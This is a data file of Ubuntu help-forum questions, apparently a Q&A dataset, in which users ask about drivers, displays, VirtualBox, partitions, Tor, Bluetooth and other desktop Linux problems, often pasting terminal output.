342932	shotwell problem with moving files	i am trying to consolidate all my photos under one shotwell directory . some of my photos were copied into that folder and some where not when i imported them ( some were imported in place and that is not what i want ) . i have written some python code to access the shotwell database to help me find the files not in the correct folder . as i understand from point 2 in how can i move my photo files from one directory or hard-drive to another ? i should be able to move them , have them show up as missing , and then re-import them from the new folder . when i try and re-import them , i am told that the duplicates will not be imported and the files stay in the missing file area . what am i doing wrong here ?
342934	qualcomm atheros ar8172 driver fix ? ( lenovo g500s )	recently i took a lenovo g500s laptop . the product id is lenovo_mt_20245 . after the installation , it could not recognize lan network adapter . after googling i found out that it has a qualcomm atheros ar8172/8176/8178 pci-e fast ethernet controller command lspci -nn | grep 0200 says : 01:00.0 ethernet controller [ 0200 ] : qualcomm atheros qca8172 fast ethernet [ 1969:10a0 ] ( rev 10 ) anybody know a way to fix this driver ?
342935	dual monitor ubuntu 12.04 lts disables all screens	i just installed ubuntu 12.04 lts on my dell n5110 inspiron and everything went fine . after i finished , i connected my external monitor to the vga slot and rebooted the laptop . my external monitor is a benq g2222hdl . at some point i see the ubuntu loading screen on both displays and afterwards nothing , my laptop display goes black and the monitor says : no signal detected . if i start the laptop with no external monitor everything works fine , but if i connect it and go to the displays application from system settings and try to detect it the same happens , my laptop displays goes black and a message on the external monitor appears saying : no signal detected . in the installation process , i did n't had this problem . ubuntu detected the external monitor and i could use it side by side with the laptop display . how can i fix this ? thanks
342936	file synchronization tool	i am running ubuntu 13.04 , gnome shell 3.6.3.1 . i need to synchronize a local folder with a remote folder . the folder contains files ( binary and text ) . there are no symlinks or hard links . but there are folders within folders . the remote system allows webdavs and ftp access . i will prefer to use webdavs , i think it is more secure than ftp . what is the best tool for the job ? i will prefer a gui tool but a command-line option that is easy to configure will also do .
342940	how to remove virtualbox `` virtualbox vms '' folder in /home directory ?	i used the following commands in the terminal to remove vbox from my pc . but the `` virtualbox vms '' folder remains in home of ubuntu 12.04 . how to completely remove this folder of vbox ? sudo apt-get remove virtualbox-ose -- purge sudo apt-get remove virtualbox* -- purge sudo ./virtualbox.run uninstall sudo apt-get remove virtualbox* -- purge sudo apt-get purge virtualbox-* replacing * with the version of virtualbox installed on my system ( e.g . sudo apt-get purge virtualbox-4.2 ) . sudo apt-get remove virtualbox-\* sudo apt-get purge virtualbox-\*
342943	full system partition	about 2 months ago i 've installed ubuntu 12.04 on a new computer . i remember , there were some problems with disc sectors , unfortunately i ca n't remember now on what it consisted . i have 15 gb for \ and the rest for \home ( total disc space - 320gb ) . i was pretty sure it 's enough . but today after i 've installed updates ( kernel updates included ) , i could n't restart the computer . there was an information , that the \ partition is full , so the computer will be working in low graphic mode , but the next window was not active , so i could n't enter `` low graphics mode '' . now i 'm working on trial version of ubuntu , using install usb drive . i do n't know how to change the size of the partitions now , but beside that i 'm not sure if this would be the solution since i 'm not sure if the partition is really full - during the installation , i 've made this partition much bigger that it was said in the tutorial and i do n't have any special applications ( ubuntu , latex , some other small stuff ) . in `` proprieties '' of the system partition is said that total capacity is 15,1 gb and 15,1 gb is used . the output of df -h is : ubuntu @ ubuntu : ~ $ df -h filesystem size used avail use % mounted on /cow 1008m 146m 811m 16 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 778m 876k 778m 1 % /run /dev/sdb1 1.9g 1.7g 177m 91 % /cdrom /dev/loop0 663m 663m 0 100 % /rofs tmpfs 1.9g 8.0k 1.9g 1 % /tmp none 5.0m 4.0k 5.0m 1 % /run/lock none 1.9g 80k 1.9g 1 % /run/shm /dev/sda1 15g 14g 0 100 % /media/adc83ce8-fc1e-447c-a61c-f69fc0e15ecc /dev/sda6 278g 83g 181g 32 % /media/485f3e29-355c-4be3-b80a-1f5abd5604b6 thanks for any suggestions update i 've followed saurav 's kumar and oldfred 's suggestions . after this i 've recovered about 800 mb of free space . still i do n't understand why my system takes so much space . i 'm hesitating a bit with `` scary '' suggestion of mikewather , but maybe i 'll have to take a risk : ) or is there anything else i could do , less `` scary `` ? thanks
342944	usb still not working after trying hundreds of tricks on virtualbox	i recently installed virtualbox on a windows 8 pc with ubuntu 13.04 as the guest . i tried to use usb , but i was n't able to access my usb stick or my phone , it just showed up on windows . i installed the guest addition and the extension pack and also added the filters . when i try to activate usb2.0 controller , i ca n't start ubuntu , it says that the device helper structure has changed and closes . also , i ca n't add me to the vboxusers group , because it does n't exist .
342945	how can i get my recognized ricoh sd card reader working on 14.04 ?	on my asus f3 series laptop there is a built in sd card reader lspci output : 09:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 09:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 09:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 09:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) it is being recognized , but when i put in an sd card , nothing happens/is mounted .
342950	how to crearte a .desktop file to launch a file.py	i made my litle python app , but now i ca n't launch the app from the .desktop that i made : [ desktop entry ] name=myapp version=0.1 exec=/usr/share/myapp/myapp.py icon=/usr/share/myapp/img/myapp.png comment=descriton ... ... type=application terminal=false startupnotify=false categories=video ; gtk ; gnome the /usr/share/myapp folder i made as root , the myapp.py has a executable properties every time i doble click the myapp.desktop the myapp.py launch , display a systray icon , but it closed and make ubuntu display a error message . if i run the myapp.py from terminal or dclick on the .py file it runs normally , no crashes
342951	how to protect an ntfs external drive to be use both in ubuntu and windows ?	i share data between my ubuntu and my wife 's windows on an external ntfs disc . sometimes i need to carry the drive with me , but i 'm afraid of losing it because it has sensitive and personal info . i 'm wondering whether there is an easy option to prevent access to the unit in case it is lost or stolen . i 've tried rohos and similar software , but i would prefer something seamlessly integrated on the oses . is there any way to encrypt ntfs and made it accessible by both ubuntu and windows 7 ?
342954	how to get the bcm4312 wireless chip working ?	i have installed ubuntu 12.04 on dell inspiron 1525 . after the installation i found out that wireless connection does not work . i was able to connect to the internet via cable . then i found out that many people have similar problems and read through many posts yet i was n't able to solve it so here is what i tried . system- > additionaldrivers- > broadcom sta wireless driver produced message `` sorry , installation of this driver failed . '' then i installed synaptic package manager and tried to reinstall and also remove and install bcmwl-kernel-source it always said something like that installation failed ( yet synaptic was showing green light next to it ) i regularly rebooted to see if there is any change but have n't seen one . then i tried removing bcmwl-kernel-source and adding b43-fwcutter and firmware-b43-lpphy-installer after reboot there was a change . i was able to see options in the menu for connection ( up right ) like `` enable wireless '' but at the place where i 'd expect the list of networks is only ( grayed ) `` wireless networks disconnected '' - and they should be there since i was able to connect with other computers , even with live ubuntu . some other info from terminal ( in the last state of system described ) katka @ katka-inspiron-1525 : ~ $ lspci | grep 'network' 0b:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) katka @ katka-inspiron-1525 : ~ $ sudo iwconfig wlan2 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off lo no wireless extensions . eth2 no wireless extensions . katka @ katka-inspiron-1525 : ~ $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no this is as much as i was able to get from other posts and now i do n't now what to do next .
342960	firefox wo n't work . locale not supported by c library	i just got a server running with ubuntu on it for the first time , i connect with ssh . i am a mac user , learning ubuntu . the idea is to automate some tasks on the server . one of these tasks involves doing some tests with selenium through python . i need to get firefox to work in order to use the driver . i always get this error however : root @ gogokino : ~ # firefox `` http : //www.google.com/ '' & root @ gogokino : ~ # ( process:32286 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . error : no display specified [ 1 ] + exit 1 firefox `` http : //www.google.com/ '' i get a very similar error when i try to run selenium from python . traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python2.7/dist-packages/selenium/webdriver/firefox/webdriver.py '' , line 60 , in __init__ self.binary , timeout ) , file `` /usr/local/lib/python2.7/dist-packages/selenium/webdriver/firefox/extension_connection.py '' , line 47 , in __init__ self.binary.launch_browser ( self.profile ) file `` /usr/local/lib/python2.7/dist-packages/selenium/webdriver/firefox/firefox_binary.py '' , line 61 , in launch_browser self._wait_until_connectable ( ) file `` /usr/local/lib/python2.7/dist-packages/selenium/webdriver/firefox/firefox_binary.py '' , line 100 , in _wait_until_connectable self._get_firefox_output ( ) ) selenium.common.exceptions.webdriverexception : message : `` the browser appears to have exited before we could connect . the output was : \n ( process:32301 ) : gtk-warning ** : locale not supported by c library.\n\tusing the fallback 'c ' locale.\nerror : no display specified\n '' so there seems to be something wrong , something about there not being a c library and something about a locale . i thought c was standard in ubuntu ? is there a quick way to solve this problem ?
342962	error : file '/grub/i386-pc/normal.mod ' not found when booting from usb drive	i have usb box with drive i removed from my notebook . the drive contains ubuntu installation . when i connect it to another computer and choose to boot from usb drive i see error : file '/grub/i386-pc/normal.mod ' not found followed by grub rescue prompt . i already tried the boot-repair utility , as well as http : //askubuntu.com/a/229453 . i also burned refind as suggested in http : //askubuntu.com/a/325883/25614 but there is no menu shown and windows start loading . http : //askubuntu.com/a/286028/25614 does n't seem to be working either ( also i do n't have -- root-directory argument in grub-install -- help ) . boot repair info : http : //paste.ubuntu.com/6079504/ i tried booting on some older computer and it worked .
342967	vidalia : `` tor is not running ''	this is what i 've done : installed tor : sudo apt-get install tor installed vidalia using the ubuntu software center i then started vidalia and it said tor is not running including an error message saying that vidalia was unable to start tor . i searched a bit and i 've found out that the problem can be that tor is already running when vidalia gets started . these were my further steps : removed tor from the runlevels sudo update-rc.d -f tor remove killed all tor processes sudo pkill -x tor vidialia still displayed the same error messages upon starting it . the path to tor in the settings should actually be correct : /usr/sbin/tor i verified its existence . however , i can not click ok in the settings dialog because the controlsocket path does not exist . it defaults to /var/run/tor/control i then activated the control socket 9051 in tor 's configuration file ( /etc/tor/torrc ) and edited vidalia 's settings accordingly . i also reset vidalia 's path to that tor config file . unfortunately , i 'm still getting the same error as above !
342968	root commands do n't work for matlab ./install ( gksu , gksudo , dkesudo )	somehow i canât launch ./install with root . i mounted matlab2013 with furius . if i execute ./install , when installer fails to install in /usr/local/matlab folder . i tried sudo , gksudo , gksu and dkesudo , but those commands do n't start installation ...
342969	how to solve `` unable to locate package update '' when doing sudo apt-get install update	when i want to update packages it shows this error : gopi @ gopi-pc : ~ $ sudo apt-get install update [ sudo ] password for gopi : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update
342974	how to make mail indicator show a number	i was wondering if it 's possible to make the mail indicator show the number of received messages and/or e-mails somewhat like skype is already doing . it 's showing a color ( blue ) at the moment but i 'd like for it to show a number when i for example receive messages instead of it changing colors . is this possible ? i was wondering if it 's possible to customize this icon as well , all i was able to find were different colors , but are there icon sets out there that have an idle icon and a new icon for when i receive messages ? the reason i want this is because i think the blue color ( or any other color ) do n't really match the ubuntu theme . best regards , hexicidal .
342975	how to reduce/control the bandwidth of a single ip on a network	i 've got a bit of an issue where i have a few people using my internet connection simultaneously , however there is a single person on the network who insists on seeding their torrents 24/7 at my max upload - 1024kbps my downlink is 10mbps , obviously while the upload is being raped my dl speeds are around 2mbps . so this is having a pretty severe effect on my network . i 'm running ubuntu 12.04 on a homeserver set up as a router . what i 'd like to do is set this person 's maximum upload at 400kbps . i 'm not too fussed about the other users , so i do n't want a tool which will apply the same rules to everyone - just specific user 's ip addresses ( preferably mac address , though that 's not too important ) . i know a little bit about linux but would you please explain as if you would a person who knew absolutely nothing about ^^ . thanks !
342976	how to reset smart results	how can i reset the smart results so it does not register previous results . my reason is that i was testing the hard drives closed together on a closed case . this made one of the hdd fail the airflow temperature reading . after opening the case up ( which lowered the temp of all drives 10 degrees celsius in 5 minutes ) and then separating the drives a bit more ( 3 less degrees ) all results were good but since the airflow reading failed in a previous reading , it always shows as failing . so how can i reset the readings for smart ?
342989	ca n't set music library in banshee	recently i noticed that my music does n't get copied to my music folder when i open files in banshee and drag them to the library . i opened preferences and the music library folder drop down was empty . i set it back to my music library and tried again : still did n't work . my preferences shows no music folder and i tried setting it to several other folders , neither would stay selected after closing the preferences . what 's going on here ? thanks .
342993	installing nctuns in ubuntu 13.10	i am not able to find the nctuns tool in the ubuntu software center . how to install the nctuns on the ubuntu 13.10 ?
342998	building the shared folder support module ... .fail !	i want to share a folder between my host windows7 and guest ubuntu but whenever i select add guest additions i get the following error : unable to mount the cd/dvd image c : \progra~1\oracle\virtua~1\vboxguestadditions.iso on the machine ubuntu . would you like to force mounting of this medium ? could not unmount the currently mounted media/drive ( verr_pdm_media_locked ) . what should i do ? i got the following message on the terminal : ... building the main guest additions module ... done ! building the shared folder support module ... .fail ! atleast tell me how i can enable copy and paste between the host and guest . i have changed the settings to bidirectional but still the copy/paste is not working
343000	mounting partion ( fat ) fails	i have several windows drives , allthough i'á¸ż not using windows anymore but too many data on it . is there a way to convert the filesystems without losing the data or how to fix this issue ? i have 4 drives , 3 of them are mounted , one is n't and gives me following error : error mounting /dev/sdh2 at /media/andreas/photo 's : command-line `mount -t `` exfat '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdh2 '' `` /media/andreas/photo 's '' ' exited with non-zero exit status 32 : mount : unknown filesystem type 'exfat ' ( udisks-error-quark , 0 )
343001	fixed wireless then bluetooth stopped working	i 've tried doing a recovery , deleted unnecessary packages . i 'm a bit baffled because after updating the kernel to include the new intel 7260 driver ( to get the wifi working ) bluetooth worked a few times and then stopped after restarting to update system packages . now the options to add a bluetooth device have disappeared and only shows `` bluetooth : off '' and `` turn on bluetooth '' and `` bluetooth settings '' it seems that maybe i changed something when updated and restarted the system , but i 'm not sure what ? i 've run sudo apt-get update followed by a sudo apt-get upgrade , seems that no packages are needed for download . i 've included some diagnostics below . if anyone could refer me to another similar solution online ( i 've been looking for a while , this seems to be very similar to my situation and has n't received a response : bluetooth adapter turned from working fine to unrecognized ) screenshows of what i see : and lsusb bus 001 device 002 : id 8087:8000 intel corp . bus 002 device 002 : id 8087:07dc intel corp . bus 002 device 003 : id 0bda:5716 realtek semiconductor corp . bus 002 device 004 : id 8087:09fa intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub sudo rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no sudo lshw *-multimedia:1 description : audio device product : lynx point-lp hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:59 memory : f7d10000-f7d13fff *-pci:0 description : pci bridge product : lynx point-lp pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : e4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:2000 ( size=4096 ) memory : df200000-df3fffff ioport : df400000 ( size=2097152 ) *-pci:1 description : pci bridge product : lynx point-lp pci express root port 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : e4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:18 memory : f7c00000-f7cfffff *-network description : wireless interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan1 version : 6b serial : 5c:51:4f:1c:8a : f4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-intelwireless-wl firmware=22.0.7.0 ip=192.168.0.10 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:58 memory : f7c00000-f7c01fff *-usb:1 description : usb controller product : lynx point-lp usb ehci # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f7d1b000-f7d1b3ff *-isa description : isa bridge product : lynx point-lp lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : lynx point-lp sata controller 1 [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz42 : usb 00.0 : 11500 bluetooth device capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:57 ioport : f0b0 ( size=8 ) ioport : f0a0 ( size=4 ) ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f060 ( size=32 ) memory : f7d1a000-f7d1a7ff *-serial unclaimed description : smbus product : lynx point-lp smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7d19000-f7d190ff ioport : f040 ( size=32 ) *-scsi physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : liteonit lmt-256 physical id : 0.0.0mark @ mark-xps-12-9q33 : ~ $ sudo hciconfig hci0 reset bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : dm81 serial : tw0xxm30550853850829 size : 238gib ( 256gb ) capabilities : gpt-1.00 partitioned partitioned : gpt configuration : ansiversion=5 guid=b27ee8c2-4f94-4aee-bb34-dadf65e11b0f *-volume:0 description : windows fat volume vendor : msdos5.0 physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : /boot/efi version : fat32 serial : 0c97-4e89 size : 495mib capacity : 499mib capabilities : boot fat initialized configuration : fats=2 filesystem=fat mount.fstype=vfat mount.options=rw , relatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro name=efi system partition state=mounted *-volume:1 description : windows fat volume vendor : msdos5.0 physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : fat32 serial : e0f9-9180 size : 15mib capacity : 39mib capabilities : precious readonly hidden nomount fat initialized configuration : fats=2 filesystem=fat name=basic data partition *-volume:2 description : windows reserved partition physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 serial : f21bffb4-6790-48c7-a3cd-04aa701961e6 capacity : 127mib capabilities : nofs configuration : name=microsoft reserved partition *-volume:3 description : windows ntfs volume physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 version : 3.1 serial : fefd-fa12 size : 460mib capacity : 489mib capabilities : precious readonly hidden nomount ntfs initialized configuration : clustersize=4096 created=2013-08-29 00:41:13 filesystem=ntfs label=winretools name=basic data partition state=clean *-volume:4 description : windows ntfs volume physical id : 5 bus info : scsi @ 0:0.0.0,5 logical name : /dev/sda5 version : 3.1 serial : ce32f619-10cd-3540-93d7-40ee173568ea size : 158gib capacity : 158gib capabilities : ntfs initialized configuration : clustersize=4096 created=2013-08-29 00:41:30 filesystem=ntfs label=os name=basic data partition state=clean *-volume:5 description : efi partition physical id : 6 bus info : scsi @ 0:0.0.0,6 logical name : /dev/sda6 serial : 5565cdb4-f266-4c46-b718-f92b0c33178c capacity : 8197mib configuration : name=basic data partition *-volume:6 description : windows ntfs volume physical id : 7 bus info : scsi @ 0:0.0.0,7 logical name : /dev/sda7 version : 3.1 serial : 74e8-1e5f size : 11gib capacity : 11gib capabilities : precious readonly hidden nomount ntfs initialized configuration : clustersize=4096 created=2013-08-29 01:59:21 filesystem=ntfs label=pbr image modified_by_chkdsk=true mounted_on_nt4=true name=microsoft recovery partition resize_log_file=true state=dirty upgrade_on_mount=true *-volume:7 description : ext4 volume vendor : linux physical id : 8 bus info : scsi @ 0:0.0.0,8 logical name : /dev/sda8 logical name : / version : 1.0 serial : ed66b002-bb2f-4b8e-a8a9-82df9cc4a2e5 size : 59gib capabilities : journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2013-09-05 19:25:30 filesystem=ext4 lastmountpoint=/ modified=2013-09-07 15:56:55 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2013-09-08 13:10:26 state=mounted *-battery description : lithium ion battery product : dell 7ym0737 vendor : sdi physical id : 1 version : not specified serial : not specified slot : system battery capacity : 51060mwh configuration : voltage=7.4v hwinfo 42 : usb 00.0 : 11500 bluetooth device [ created at usb.122 ] unique id : 7bwa.cduiy6836r9 parent id : pbe4.2dfusyriemd sysfs id : /devices/pci0000:00/0000:00:14.0/usb2/2-3/2-3:1.0 sysfs busid : 2-3:1.0 hardware class : bluetooth model : `` bluetooth device '' hotplug : usb vendor : usb 0x8087 device : usb 0x07dc revision : `` 0.01 '' driver : `` btusb '' driver modules : `` btusb '' speed : 12 mbps module alias : `` usb : v8087p07dcd0001dce0dsc01dp01ice0isc01ip01in00 '' driver info # 0 : driver status : btusb is active driver activation cmd : `` modprobe btusb '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 38 ( hub ) sudo uname -a linux mark-xps-12-9q33 3.11.0-intelwireless-wl # 1 smp sat sep 7 20:40:41 edt 2013 x86_64 x86_64 x86_64 gnu/linux sudo lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise sudo dpkg -l | grep blue ii blueman 1.23-0ubuntu2.1 a graphical bluetooth manager ii bluez 4.98-2ubuntu7 bluetooth tools and daemons ii bluez-alsa 4.98-2ubuntu7 bluetooth alsa support ii bluez-cups 4.98-2ubuntu7 bluetooth printer driver for cups ii bluez-gstreamer 4.98-2ubuntu7 bluetooth gstreamer support ii gir1.2-gnomebluetooth-1.0 3.2.2-0ubuntu5 introspection data for gnomebluetooth ii gnome-bluetooth 3.2.2-0ubuntu5 gnome bluetooth tools ii libbluetooth3 4.98-2ubuntu7 library to use the bluez linux bluetooth stack ii libgnome-bluetooth8 3.2.2-0ubuntu5 gnome bluetooth tools - support library ii pulseaudio-module-bluetooth 1:1.1-0ubuntu15.3 bluetooth module for pulseaudio sound server sudo hciconfig hci0 reset ca n't init device hci0 : connection timed out ( 110 ) hwinfo -- bluetooth [ created at usb.122 ] udi : /org/freedesktop/hal/devices/usb_device_8087_7dc_noserial_if0 unique id : 7bwa.cduiy6836r9 parent id : pbe4.2dfusyriemd sysfs id : /devices/pci0000:00/0000:00:14.0/usb2/2-3/2-3:1.0 sysfs busid : 2-3:1.0 hardware class : bluetooth model : `` bluetooth device '' hotplug : usb vendor : usb 0x8087 device : usb 0x07dc revision : `` 0.01 '' driver : `` btusb '' driver modules : `` btusb '' speed : 12 mbps module alias : `` usb : v8087p07dcd0001dce0dsc01dp01ice0isc01ip01in00 '' driver info # 0 : driver status : btusb is active driver activation cmd : `` modprobe btusb '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 4 ( hub ) any help would be appreciated . i 'll even send you a beer ! ; )
343013	popping up the folder when clicking `` show in folder ''	using ubuntu 13.04 , whenever i downloaded something using google chrome , i can click on the downloaded file , and click `` show in folder '' . currently it does not also pop up the window ( nautilus ) that shows the file , nor does it highlight the file in the `` just-opened '' folder . edit : the same also happens in a similar situation using dropbox find in folder . are there settings to get this done which i ca n't find ?
343014	how to install a hp laserjet p1102w ?	i just did an install of the hp laserjet p1102w printer and its not working . i 'm using ubuntu 12.04 , and i went to see if i had hplip installed and it said i did . how do i do this ?
343015	packaging an application for distribution in ubuntu software center	i am trying to package my app into a .deb file following the tutorial . everything works fine as far as the application software goes , but i ca n't figure out how to install the sample data and config files in the right place . i am trying to install to ~/.config/myapp . how do you specify this in the debian install file ? everything runs , but the data actually gets put in a new directory called ~ under the root . i need them to be in the users home directory , owned by the user . do i have to put these files in the /opt/myapp directory and then copy them , from within the application , to ~/.config ? or is there another way to do this ?
343016	i have a thinkpad t60 with ubuntu 13.04 and wifi is inoperable -- anyone know how to get it working ?	the network device is identified as `` hardware switch disabled '' , but i know of no such switch . i am part of a volunteer group ( kinfolk ) which loans out laptops to patients and parents at children 's hospitals in the nemours ( dupont family ) community . some company donated several t60s and at least on t61 recently and i am trying to determine if there is any value in putting ubuntu on the machines . i was able to install windows 7 on the test machine , but it is also unable to see any wifi , although it claims the adapter is `` enabled '' . any advice is welcome !
343020	xubuntu 13.04 - all sound streams skips for split second	i love my xubuntu 13.04 installation , but i notice a very unfortunate problem which i did not believe exist until after installation . while playing any sort of media - flash , audacious , gmusicbrowser - i 'll occasionally hear intermittent `` blips '' where the last split-second of the audio stream plays again . the audio stream continues thereafter , but not before skipping over the same split-second length of the audio . i observe this skipping effect in video as well , but i 'm mostly concerned about the audio . as i mentioned , this behavior seems to have emerged post-installation , so i suspect i might have installed an errant package somewhere along the way . i could post the output of dpkg -l if you 'd like . one other detail which might be salient is that this installation lives on half of an old 80gb ide sata drive . let me know if you need any more information than what i 've provided you . sound card information : $ lspci | grep -i audio 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 )
343023	ubuntu does n't detect hdmi connection	whenever i try to connect my laptop on my tv through hdmi connection , it does n't work ( vga does ) . here is the output for xrandr : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 309mm x 173mm 1366x768 60.1*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) 1440x900_60.00 59.9 hdmi1 disconnected ( normal left inverted right x axis y axis ) 1920x1080_60.00 60.0 dp1 disconnected ( normal left inverted right x axis y axis ) the resolution found on hdmi1 was get from my .xprofile : xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync xrandr -- addmode vga1 `` 1440x900_60.00 '' xrandr -- addmode hdmi1 `` 1920x1080_60.00 '' i 'm using intel core i5 with hd graphics 3000 . does anyone know the workaround for this problem ? thanks !
343025	how to prevent the keyboard shortcuts to be forgotten at reboot ?	i have ubuntu 12.10 and everytime i have to reset some of my keyboard shortcuts . for example , i have `` toggled maximization state '' as strg + alt + 5 but i want it as f10 so i always have to make the same settings every day what i thought was , to make the configuration chmod to root , so that it can not be changed for my actual user . where are the keyboard shortcuts in ubuntu stored and what can i do ?
343026	which is a safe way to record firefox passwords in gnome seahorse keyring ?	searching for answers about ways to record firefox passwords in gnome seahorse keyring vault , i found severals possibilities : firefox gnome keyring firefox addon from https : //github.com/ in this answer and this answer gnome keyring password integration firefox addon from https : //addons.mozilla.org/en-us in this question integration con gnome keyring firefox addon from https : //addons.mozilla.org/fr seems to be the spanish version of the previous bullet on the french server ( humm weird ) add this ppa in https : //launchpad.net and install package called `` mozilla-gnome-keyring '' from this bugzilla but now how can i know which solution is safe ?
343028	how to reinstall ubuntu over my old installation ?	i have a machine that came with 12.04 lts pre-installed . after working seamlessly , it sat unused for a bit and now will not boot properly . i 've searched for fixes , but none has worked . i 'd like to just do a `` clean install '' of 12.04.3 . i have created a bootable dvd . once i 'm in the boot menu and boot from the dvd , is there anything else i need to do ? will the installer `` overwrite '' what is already installed or do i need to remove the old os first ? i wo n't end up with two partitions , one with the old broken os and one with the newly installed one , will i ? please use as simple as language as possible when answering .
343030	can not install broadcom wireless driver on ubuntu 12.04	i 'm setting this up as a new question because i changed my installation and i thought that might be relevant : previously i was using wubi , but i felt like that was causing a lot of performance issues ( the whole thing ran really slow ) , so i partitioned my drive and installed ubuntu 12.04 natively , and it seems to run much faster . but i still ca n't get my wireless to work . i know this question has been addressed elsewhere , and i have honestly tried almost every solution suggested , but it still does n't work . my jockey.log says : 2013-09-08 14:50:10,100 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-09-08 14:50:10,188 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted for further information on my driver , when i run : lspcci -nn -d 14e4 : i get : 0c:00.0 network controller [ 0280 ] : broadcom corporation cmb4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) any help would be very much appreciated .
343031	install wont boot up , stuck on loading text dots / restarts	friend gave me her laptop , we agreed on ubuntu , but i have troubles even booting up live version ( see the notebook ) . i tried 12.04 64bit on usb stick , it does nothing , when i choose booting live version , it just restarts pc . then i tried 32bit version , it starts loading , but its stuck on loading components , printing on black screen just dots ... ... ... .. i googled it , found similar problem - somebody suggested to use older version and then upgrade it . i went through 11.04 , 10.04 - 64 and 32 same result . restart or infinite loading . i did memtest , it showed 4 errors , windows vista is running `` fine '' , no `` bluescreens '' etc . any ideas what am i doing wrong ?
343033	can not change brightness of my laptop	my laptop is a dell 3521 with dual graphic cards , which usually cause some problems , and i have switched off the amd radeon card . now , when i want to turn the brightness down by dragging the brightness bar in the `` brightness and lock settings '' and i close the window , nothing changes , and when i open `` brightness and lock settings '' again , the brightness bar turn back to its previous state ! so , is it something is the system or i did some kind of mistake ?
